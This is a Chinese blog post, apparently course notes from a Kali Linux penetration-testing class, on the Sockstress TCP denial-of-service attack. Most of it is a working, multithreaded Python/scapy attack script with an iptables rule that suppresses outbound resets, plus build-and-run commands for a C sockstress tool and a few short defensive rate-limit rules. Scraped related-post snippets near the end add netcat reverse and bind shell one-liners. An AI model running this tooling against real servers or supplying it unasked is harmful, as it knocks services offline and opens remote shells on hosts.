Kali Linux渗透测试 127 拒绝服务--Sockstress 攻击

最新推荐文章于 2023-10-30 16:37:04 发布
原创 最新推荐文章于 2023-10-30 16:37:04 发布 · 2.1k 阅读 · 8 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#kali-linux
本文详细介绍使用Kali Linux进行拒绝服务(DOS)攻击的方法,包括利用Python和C语言编写的sockstress脚本进行TCP连接攻击的过程。文章还探讨了通过修改iptables规则实施攻击的技术细节,并提出了几种防御策略。

本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程

Kali Linux渗透测试(苑房弘)博客记录

1. 简介

  • 2008年由Jack C.Louis 发现
  • 针对TCP服务的拒绝服务攻击
    • 消耗被攻击目标系统资源
    • 与攻击目标建立大量socket链接
    • 完成三次握手,最后的ACK包window 大小为0 (客户端不接收数据)
    • 攻击者资源消耗小(CPU、内存、带宽)
    • 异步攻击,单机可拒绝服务高配资源服务器
    • Window 窗口实现的TCP 流控

2. 脚本攻击

1. python 测试脚本

#!/usr/bin/python
#coding=utf-8

from scapy.all import*
from time import sleep
import thread
import random
import logging
import os
import signal
import sys
import signal

logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

if len(sys.argv) != 4:
    print "用法: ./sockstress.py [IP地址] [端口] [线程数]"
    print "举例: ../sockstress.py  1.1.1.1 80 20 # 请确定被攻击端口处于开放状态"
    sys.exit()

target = str(sys.argv[1])
dstport= int(sys.argv[2])
threads = int(sys.argv[3])

## 攻击函数
def sockstress(target,dstport) :
    while 0 == 0:
        try:
            x = random.randint(0,65535)
            response = sr1(IP(dst=target)/TCP(sport=x,dport=dstport,flags = 'S'),timeout=1,verbose=0)
            send(IP(dst=target)/TCP(dport=dstport,sport=x,window=0,lags='A',ack=(response[TCP].seq + 1) )/'\x00\x00',verbose=0)
        except:
            pass

## 停止攻击函数
def shutdown(signal,frame):
    print "正在修复 iptables 规则"
    os.system('iptables -D OUTPUT -p tcp --tcp-flags RST RST -d '+ target +' -j DROP')
    sys.exit()

## 添加iptables规则
os.system('iptables -A OUTPUT -p tcp --tcp-flags RST RST -d '+ target +' -j DROP')
signal.signal(signal.SIGINT, shutdown)

## 多线程攻击
print "\n攻击正在进行...按 Ctrl+C 停止攻击"
for x in range(0,threads):
    thread.start_new_thread(sockstress, (target,dstport))

##永远执行
while 0 == 0:
    sleep(1)

  • 测试结果

    # 查看系统连接数
netstat | grep ESTABLISHED | wc -l

2. C 攻击脚本

  • 下载编译

    github 下载地址

    gcc -Wall -c sockstress.c
gcc -pthread -o sockstress sockstress.o
./sockstress 10.10.10.132:80 eth0
./sockstress 10.10.10.132:80 eth0 -p payloads/http

防火墙规则
iptables -A OUTPUT -p TCP --tcp-flags rst rst -d 10.10.10.132 -j DROP

  • 查看攻击效果

    netstat -tulnp | grep ESTABLISHED | wc -l
free
top

3. 防御措施

  • 直到今天sockstress攻击仍然是一种很有效的DOS攻击方式
  • 由于建立完整的TCP三步握手,因此使用syn cookie防御无效
  • 根本的防御方法是采用白名单(不实际)
  • 折中对策限制单位时间内每IP建的TCP连接数
    • 封杀每30秒与 80 端口建立连接超过 10 个的IP地址
    • iptables -I INPUT -p tcp –dport 80 -m state–state NEW -m recent–set
    • iptables -I INPUT-p tcp -dport 80 -m state-state NEW-m recent -update–seconds 30 -hitcount 10 j DROP
    • 以上规则对DDOS攻击无效
socketIOStress:一个简单的SocketIO连接压力测试工具
05-13
简单的socketIO压力测试仪
面对趋于疯狂的假墙攻击该怎么办?被刷统计被要挟如何自救?
magicblack老王的博客
01-05 3323
关于假墙攻击最新分析总结说明,希望对大家有用。 la之前已经持续被攻击2个月,期间也会拨测经常部分地区返回状态0,然后升级到cloudflare pro问题得到解决(前提是服务器绝对没问题80不封),然后前天被最猛的一波攻击,导致解析失效将近12小时,拨测所有dns都是空的或者0.0.0.0,询问了ymp注册商得知被注册局要求停止解析,然后回复说明了情况,重新恢复了解析。也获取到了太多有用信息,黑客会通过某种手段攻击你的域名,间接导致攻击注册局的服务器,注册局怕影响其他客户会选择让代理商停止你的解析,这样
kali Linux的DDos攻击(详细教程)
weixin_66727473的博客
10-30 1万+
本文章使用的是Kali Linux的2021-1的版本。vm虚拟机里kali安装我就不做说明了,相信各位可以的不会的可以私聊本作者。请正确使用DDos不要用来做违反当地法律法规的事情,否则后果自负。DDos攻击首先打开我们kali Linux里的命令行如果有kali模式的话我们要先切换到root模式切记kali的密码是不显示的大部分账号密码都是一致的 接下来输入以下命令:这样DDos的数据包就已经下载到了你的Kali上 下面进入你所下载的DDos文件夹 (注意字母大小写)然后用python执行 如果进入了
kali系统进行DoS攻击教程(虚拟机单人可玩)
2301_77296801的博客
09-06 2099
DoS攻击是指恶意的攻击网络协议实现的缺陷或直接通过野蛮手段残忍地耗尽被攻击对象的资源,目的是让目标计算机或网络无法提供正常的服务或资源访问,使目标系统服务系统停止响应甚至崩溃,而在此攻击中并不包括侵入目标服务器或目标网络设备。第三次握手:客户端收到服务器的SYN十ACK包,向服务器发送确认包ACK(ACK=j+1),此包发送完毕,客户端和服务器进入ESTABLISHED状态,完成三次握手,客户端与服务器开始传送数据。点击编辑-->虚拟网络编辑器-->添加网络-->vmnet 4-->修改。
Kali Linux系列之拒绝服务攻击(DOS)实战(上)
微信公众号:码奋
07-10 2033
​ (你的世界是个什么样的世界?你说,我们倾听!) ----------------- 小百科 拒绝服务攻击即是攻击者想办法让目标机器停止提供服务,是黑客常用的攻击手段之一。其实对网络带宽进行的消耗性攻击只是拒绝服务攻击的一小部分,只要能够对目标造成麻烦,使某些服务被暂停甚至主机死机,都属于拒绝服务攻击拒绝服务攻击问题也一直得不到合理的解决,究其原因是因为网络协议本身的安全缺陷,从...
拒绝服务攻击DOS
hxx78的专栏
06-18 4604
副标题:系统漏洞攻击 摘要:拒绝服务(DoS)攻击是指攻击者通过某种手段,有意地造成计算机或网络不能正常运转从而不能向合法用户提供所需要的服务或者使得服务质量降低。分布式拒绝服务(DDoS)攻击则是指处于不同位置的多个攻击者同时向一个或数个目标发起攻击,或者一个或多个攻击者控制了位于不同位置的多台机器(称为傀儡机)并利用这些机器对受害者同时实施攻击。 一、关于拒绝服务攻击技术的现状: 广义而
DDOS攻击详解
zhuqiqi261717的博客
09-11 2293
DDOS攻击一般指分布式拒绝攻击,是一种攻击者操纵大量计算机,或位于不同位置的多个攻击者,在短时间内通过将攻击伪装成大量的合法请求,向服务器资源发动的攻击,导致请求数量超过了服务器的处理能力,造成服务器运行缓慢或者宕机。通常由僵尸网络用于执行此恶意任务,由于攻击的发出点是分布在不同地方的,这类攻击称为分布式拒绝服务攻击
kali无法连接网络(桥接、NAT无效)
热门推荐
m0_75138137的博客
11-28 1万+
kali中通过桥接、NAT都无法获取到IP地址的解决办法
Kali渗透测试之服务扫描1——banner捕获、服务识别、操作系统识别
浅浅的博客
05-05 6651
我们不能简单地通过端口号来识别端口上运行的应用,因此可以通过服务扫描来进行识别,从而有针对性地找到它的利用代码或者发现它的漏洞以及利用方法。本篇除了讲解如何识别端口所对应的服务,还会讲解如何识别目标操作系统。不同的操作系统自带的服务上面也会存在一些漏洞,因此我们可以利用漏洞的弱点直接取得目标系统的管理权,或者取得它的用户权限,然后在用户权限的基础之上进行本地提权,拿到它的管理员权...
渗透测试kali 流量转发 proxychains转发 socks转发
网络安全领域优质创作者
12-15 1727
本文解决的需求是,本地kali虚拟机通过ProxyChains进行命令行转发流量到kali服务器,用服务器访问网络。 感觉很复杂的需求,我也说不明白,反正折腾了一天,是搞定了,这是因为要连接lab考试,但是本地的网络不是太稳定,所以搭建的一个备用方案,具体方法如下: 1,首先需要一台服务器,服务器开启openvpn连接实验室环境。 2,本地windows物理机执行,然后输入密码,结果如...
Kali DDOS/ddos 拒绝服务攻击-sockstress攻击
weixin_69830800的博客
06-25 557
我们去查看win7(靶机)的cpu性能,攻击持续时间越长占用率越高,访问apache2的页面就会出问题。我们使用phpstudy小皮面板,在win7下面搭建一个本地的网站。与SYN泛洪不同,sockstress实际上完成了连接,并且。攻击者消耗少量资源,而服务端消耗大量资源。无法使用SYN Cookie阻止。)压缩文件解压,然后执行。
Kali-NC(瑞士军刀)四种连接方法
boooooooooooooo的博客
11-16 7168
第一种: NC(反向)连接:受控端先启动好监听(最新版本Kali)→控制端主动连接(老版本Kali) nc -lvp 9999 //开启监听 nc 192.168.158.133 9999 -c /bin/bash //控制端主动连接 第二种: NC(正向)连接:受控端先启动好监听(老版本Kali)→控制端主动连接(最新版本Kali) nc -lvp 6666 -e /bin/bash //受控端开启监听 nc 192.168.158.131 6666 //...
kali虚拟机配置桥接模式无法上网解决方案大全
weixin_45452925的博客
03-23 9793
这个应该是虚拟机软件的问题,所以大家可以选择一个已有的或者自己添加一个然后改成桥接模式。大家要记住,在改写文件时一定要是用root用户才有改写的权限,kali用户就算用强制的改写保存也改写不了。输入ifconfig,配置信息正常的话应该是有eth0这个网卡,同时会显示配置好的IP信息,如下。
网站被攻击了怎么办?3种网站攻击的解决办法
weixin_34067049的博客
08-15 621
 随着互联网的发展,越来越多的人们开始认识到网络宣传的优越性。大大小小的网站层出不穷。然而随着网站数量的增加,出现的问题也大大增多。同行之间的竞争、也随之体现在了网络之间。一些不法分子也逐渐转移阵地到网络上来谋取利益。同行之间往往雇佣黑客打压对手攻击对方网站,甚至有些人故意攻击别人网站索要保护费。不给钱就攻击你,让你网站瘫痪。对于这类事情,网站主往往是求助无门干着急,不得已妥协。   各位站长在...
【安全牛学习笔记】Kali Linux 安装-持久加密USB安装、熟悉环境、熟悉BASH命令
weixin_34159110的博客
09-06 1844
持久加密USB安装-1LUKS: linux UNified Key Setup 磁盘分区加密规范 不依赖于操作系统的磁盘级加密 Windows——DoxBox 后端:dm-crypt 前端:cryptsetup 微软的bitlocker将镜像刻录到U盘 dd if=kali-linux-1.1.0-amd64.iso of=/dev/sdb bs=1Mroot...
localhost不能访问127.0.0.1可以访问的原因及解决方法 被打磨的不像人样
weixin_34389926的博客
05-20 1万+
localhost不能访问127.0.0.1可以访问的原因及解决方法 作者:admin    时间:2013-12-16 10:58:47    浏览:16599   有时候我们在调试程序的时候,会出现一些莫名其妙匪夷所思的奇怪问题,localhost不能访问但127.0.0.1可以访问的问题就是其中之一。 我 估计大多数人都不会去想localhost到底与127.0...
kali 输入ifconfig后,显示为127.0.0.1.
nzw1134864657的博客
12-17 1073
dhclient -r dhclient
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值